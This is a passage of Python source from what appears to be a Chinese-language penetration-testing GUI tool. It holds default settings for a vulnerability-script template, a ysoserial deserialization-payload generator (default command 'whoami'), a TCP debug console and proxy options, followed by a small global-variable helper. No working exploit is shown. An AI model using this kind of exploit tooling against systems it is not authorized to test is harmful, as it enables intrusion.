53 | #漏洞测试界面_C
54 | Ent_C_Top_url = StringVar(value='http://httpbin.org')#漏洞测试界面_顶部_目标地址
55 | Ent_C_Top_path = StringVar(value='/ip')#漏洞测试界面_顶部_路径
56 | Ent_C_Top_reqmethod = StringVar(value='GET')#漏洞测试界面_顶部_请求方法类型_GET
57 | Ent_C_Top_vulname = StringVar(value='用作类名, 不能包含空格')#漏洞测试界面_顶部_脚本名称
58 | Ent_C_Top_cmsname = StringVar(value='')#漏洞测试界面_顶部_CMS名称
59 | Ent_C_Top_cvename = StringVar(value='cve_')#漏洞测试界面_顶部_CVE编号
60 | Ent_C_Top_version = StringVar(value='app=\'\'')#漏洞测试界面_顶部_版本信息
61 | Ent_C_Top_info = StringVar(value='命令执行描述')#漏洞测试界面_顶部_info_命令执行描述
62 | Ent_C_Top_template = StringVar(value='请选择模板')#漏洞测试界面_顶部_template_请选择模板
63 |
64 | #测试
65 | Ent_Cmds_Top_type = StringVar()#命令控制台界面_顶部_漏洞类型
66 | Ent_Cmds_Top_typevar = StringVar(value='yy yang haha 1 2 3 4 5 7 8 0')#命令控制台界面_顶部_漏洞类型值
67 |
68 | #反序列化利用界面
69 | Ent_yso_Top_type = StringVar(value='-jar')#ysoserial代码生成界面_顶部_类型
70 | Ent_yso_Top_class = StringVar(value='利用链类')#ysoserial代码生成界面_顶部_利用链类
71 | Ent_yso_Top_cmd = StringVar(value='whoami')#ysoserial代码生成界面_顶部_命令
72 |
73 | #TCP调试界面
74 | TCP_Debug_IP = StringVar(value='127.0.0.1')#TCP调试界面_IP地址
75 | TCP_Debug_PORT = IntVar(value=80)#TCP调试界面_端口
76 | TCP_Debug_PKT_BUFF_SIZE = IntVar(value=2048)#TCP调试界面_接收缓冲区大小
77 |
78 | #其他变量
79 | variable_dict = {
80 | "Proxy_CheckVar1" : Proxy_CheckVar1,
81 | "Proxy_CheckVar2" : Proxy_CheckVar2,
82 | "PROXY_TYPE" : Proxy_type,
83 | "Proxy_addr" : Proxy_addr,
84 | "Proxy_port" : Proxy_port,
85 | "Proxy_page" : Proxy_page,
86 | "Proxy_webtitle" : Proxy_webtitle,
87 | }
--------------------------------------------------------------------------------
/util/globalvar.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: utf-8 -*-
3 | """
4 | 全局变量: GlobalVar
5 | """
6 | def _init():
7 | global _global_dict
8 | _global_dict = {}
9 |
10 | def set_value(name, value):
11 | _global_dict[name] = value
12 |
13 | def get_value(name, defValue=None):
14 | try:
15 | return _global_dict[name]
16 | except KeyError:
17 | return defValue
--------------------------------------------------------------------------------